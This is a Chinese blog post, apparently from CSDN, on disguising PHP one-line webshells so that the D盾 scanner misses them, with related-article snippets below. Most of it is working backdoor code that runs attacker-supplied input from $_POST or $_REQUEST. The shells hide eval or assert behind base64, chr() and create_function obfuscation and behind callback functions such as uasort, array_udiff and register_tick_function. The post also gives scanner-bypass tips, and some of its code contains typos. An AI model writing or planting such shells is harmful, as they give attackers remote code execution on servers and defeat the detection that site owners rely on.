PHP里rot base,一句话木马简单变形

最新推荐文章于 2024-08-22 20:44:44 发布
最新推荐文章于 2024-08-22 20:44:44 发布
阅读量339 收藏 2
点赞数
文章标签: PHP里rot base

木马变形的方式:

1.字符串拼接(编码,base64,rot13,chr())

base64编码案列:

$__C_C = "WlhaaGJDZ2tYMUJQVTFSYmVGMHBPdz09";

$__P_P = "abcdefghijklmnopqrstuvwxyz";

$__X_X = "123456789";

$__O_O= $__X_X[5] . $__X_X_[3] . "_"; //64

$__B_B = $__P_P{1} . $__P_P[0] . $__P_P[18] . $__P_P[4]; //base

$__H_H = $__B_B . $__O_O . $__P_P[3].$__P_P[4] . $__P_P[2] . $__P_P[14] . $__P_P[3] . $__P_P[4]; //base64_decode encode

$__E_E=$__P_P[4] . $__P_P[21] . $__P_P[O] . $__P_P[11]; //eval

$__F_F=$__P_P[2] . $__P_P[17] . $__P_P[4] . $__P_P[0] . $__P_P[19] . $__P_P[4]; //create

$__F_F=$__F_F . ’_’ . $__P_P[5] . $__P_P[20] . $__P_P[13] . $__P_P[2] . $__P_P[19] . $__P_P[8] . $__P_P[14] . $__P_P[13]; //create function

$__D_D=$__F_F('$__S_S',$__E_E . '("$__S_S");'); //create_function("",'eval();')==eval()

@$__D_D($__H_H($__H_H($__C_C))); //eval('eval($_POST[x]);')

?>

chr()案列:

$_uU=chr(99) . chr(104) . chr(114);

//echo $_uU;

$_cC=$_uU(101) . $_uU(118) . $_uU(97) . $_uU(108) . $_uU(40) . $_uU(36) . $_uU(95) . $_uU(80) . $_uU(79) . $_uU(83) . $_uU(84) . $_uU(91) . $_uU(49) . $_uU(93) . $_uU(41) . $_uU(59);

//echo $ cC;

$_fF=$_uU(99) . $_uU(114) . $_uU(101) . $_uU(97) . $_uU(116) . $_uU(101) . $_uU(95) . $_uU(102). $_uU(117) . $_uU(110) . $_uU(99) . $_uU(116) . $_uU(105) . $_uU(111) . $_uU(110);

//echo $_fF;

$_=$_fF("",$_cC);@$_();

?>

2.create_function(参数,函数体代码) 创建匿名函数

3.preg_replace(‘/*/e’,phpinfo(),$data)

4.字符位运算(拼接)

5.

6.不死马

7.gzinflate解压

8.不同位置传值

参数回调法:

回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。

已被D盾查杀的函数:

array_filter()

array_walk()

array_walk_recursive()

array_map()

registregister_shutdown_function();

filter_var()

filter_var_array()

uasort()

uksort()

array_reduce() 可疑(级别2)

array_walk()

array_walk_recursive()

最一般的绕狗、后门思路:

call_user_func('assert', $_REQUEST['pass']);   //直接参数回调,将$_REQUEST['pass']传入的数据,传递给assert函数去执行。

双参数回调后门:

$e = $_REQUEST['e'];

$arr = array('test', $_REQUEST['pass']);

uasort($arr, base64_decode($e));

?>

e作为传参参数,使用base64加密过的assert函数,即YXNzZXJ0,pass作为密码。整个过程是将调用$e函数,执行$arr,也就是用assert进行代码执行

衍生出来的方法有:

1.换为uksort函数:

$arr = array('test' => 1, $_REQUEST['pass'] => 2); uksort($arr, $e);

2.面向对象的方法:

// way 0

$arr = new ArrayObject(array('test', $_REQUEST['pass']));

$arr->uasort('assert');

// way 1

$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));

$arr->uksort('assert');

?>

3.array_reduce

$e = $_REQUEST['e'];

$arr = array(1);

array_reduce($arr, $e, $_POST['pass']);

?>

4.array_udiff

$e = $_REQUEST['e'];

$arr = array($_POST['pass']);

$arr2 = array(1);

array_udiff($arr, $arr2, $e);

?>

变种array_udiff

function newsSearch($para0,$para1){

$evil=$para0;

$exec=$para1;

array_udiff($arr=array($evil),$arr1 = array(''),$exec);

}

$exec=base64_decode($_REQUEST['exec']);

newsSearch($_POST['key'],$exec);

?>

5.register_tick_function()

declare(ticks=1);

register_tick_function(base64_decode($_REQUEST['e']),$_REQUEST['a']);

?>

6.变种call_user_func_array()

尝试模仿正常函数调用,定义一个简单的function:

function newsSearch($para0){

$evil=$para0;

$exec=$_GET['id'];

call_user_func_array($exec,array($evil));

}

newsSearch($_POST['tid']);

?>

使用D盾查杀。没过!!变量$exec被解析成了$GET["id"],但$evil没有被解析,猜测只要将$exec放在newSearch()函数外面用GET方法获取,就不会被D盾解析,编写新的shell:

function newsSearch($para0,$para1){

$evil=$para0;

call_user_func_array($para1,array($evil));

}

$exec=base64_decode($_GET['id']);

newsSearch($_POST['tid'],$exec); ?>

同样使用call_user_func函数,构造shell如下:

function newsSearch($para0,$para1){

$evil=$para0;

call_user_func_array($para1,array($evil));

}

$exec=base64_decode($_GET['id']);

newsSearch($_POST['tid'],$exec); ?>

三参数回调后门

$e = $_REQUEST['e'];

$arr = array($_POST['pass'] => '|.*|e',);

array_walk_recursive($arr, $e, '');

?>

这段代码的最终效果是回调名字为$e的函数,$arr数组中的$_POST[pass](键)作为回调函数的第一个参数,'|.*|e'作为第二个参数。''作为第三个参数。

最常见的preg_replace

preg_replace('|.*|e', '你的命令', '');

其他效果类似的函数:

mb_ereg_replace

preg_filter

sqlite回调后门

如果可以使用PDO的话,可以用sqlite的PDO来执行代码

$db = new PDO('sqlite::memory:');

$st = $db->query("SELECT 'phpinfo()'");

$re = $st->frtch

?>

小陶的盐汽水
关注
PHP一句话木马变形
weixin_40195907的博客
11-25 2671
PHP一句话木马 @ 表示忽略报错 $_POST 表示使用post的方式提交变量 attack代表为变量名 <?php @eval($_POST['attack'])?> 上传木使用实例:
php7 一句话木马,一句话木马的套路
weixin_28886359的博客
03-09 1627
原标题:一句话木马的套路0×01 前言尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。0×02 关于 eval 于 assert关于 eval 函数在 php 给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 ,让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你 这样是...
php一句话木马变形技巧
小司机的奥拓
12-25 1562
更换执行数据来源字符替换或者编码采取隐匿手段tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
PHP一句话木马免杀方式汇总
最新发布
qq_48368964的博客
08-22 779
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
基于php一句话木马的变种总结
Alexz__的博客
10-10 4833
说实话php我只是在w3c系统的看了30分钟,对不是3天30天3个小时是30分钟 那我能不能说我花半个小时接通了一门计算机语言呢 (逃 需要记住的是:熟读PHP手册就会有不一样的发现 贴上来的都是亲测能用 php5.4.45 apache phpstudy环境 $_GET函数数据来源的web响应木 @system($_GET['shell']) @pass...
关于PHP一句话木马
Hexin_Information的博客
12-04 876
之前关于某网站被攻击,多次更换备份代码无效的情况下,于是换了服务器,网站正常运行,但是将该域名(网址)发在QQ对话框边,会提示说“危险网站,千万不要访问” 因此点击为什么危险?会出现这样的页面: 因此,做了站长申诉,只要将下面信息填写完整,提交就好了 在24小时内,会得到反馈: 提示说有一个危险页面,要删除了恶意信息后,4周后才可以再次申诉,因此使用360杀毒还有电脑安全
一句话木马的各种变形
司徒荆的博客
07-13 2573
一句话木马的各种变形
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2430
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
php中fputs写入一句话,phpmyadmin写入一句话木马的测试
weixin_42525387的博客
03-11 919
方法一,一句话木马偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select''INTOOUTFILE'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题接着尝试:select''INTOOUTFILE'E:\\Web\\xxx.xx.vn\\wp-content\\error...
msf生成php,11.7 Weevely3生成网页木、Backcookie后门生成工具、使用msf生成木、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1946
:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木、屑木、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木(基于python)python weevely.py -h python...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1791
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
PHP一句话木马Webshell变形免杀总结
weixin_30559481的博客
11-20 1696
0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下: @eval ($_POS...
php变异一句话
黑面小窝
10-23 2083
第一种:1.php   在菜刀写http://www.xxx.com /1.php?2=assert密码是1   第二种2.php   $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀写 http://www.xxx.com/2.php?_=asser
php最新变异一句话
weixin_30765505的博客
11-15 112
第一种:1.php <?=($_=@$_GET[2]).@$_($_GET[1])?> 在菜刀写http://www.xxxxx.net/1.php?2=assert密码是1 第二种2.php <? $_=”"; $_[+""]=”; $_=”$_”.”"; $_=($_[+""]|””).($_[+""]|”").($_[+""]^””); ?> &...
php一句话怎么写_php最新变异一句话
weixin_32185607的博客
03-08 129
注释:站长的任务又加重了,好好认识下,以后见了好清除本来匿名发在土司上,现在应该传出去了,两个是来自国外的http://h.ackack.net/tiny-php-shell.htmlhttp://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/具体看国外的文章吧第一种:1.php=($_=@$_GET[2]).@$_($_...
php变种一句话,PHP一句话木马研究
weixin_30010599的博客
03-09 456
最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array_walk()array_walk_recursive()array_map()...
@php一句话猥琐流搞法
fengling132的专栏
04-20 1195
在渗透中常常遇到拦截eval的,所以 这种形式的会被拦截 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) 这种形式可以绕过,另外还有其他形式         今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。   完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3206
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马变形 常用变形函数 convert_uudecode() #解码一个
php7版本一句话木马,一句话查找 PHP
weixin_39738152的博客
03-18 522
一句话查找 PHPfind ./ -name “*.php” |xargs egrep “phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc”> /tmp/php.txtgrep -r –include=*.php ‘[^a-z]eval($_POST’ . > /tmp/eval.txt...
base64 url md5 ? rot13 reverse base64
05-08
rot13是一种简单的替换加密算法,它将字母表中的每个字母替换为距离它13个位置之后的字母。rot13加密和解密使用相同的算法,因此也称为“回旋13”。 reverse是将字符串反转的操作,例如将字符串"hello"反转后变成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值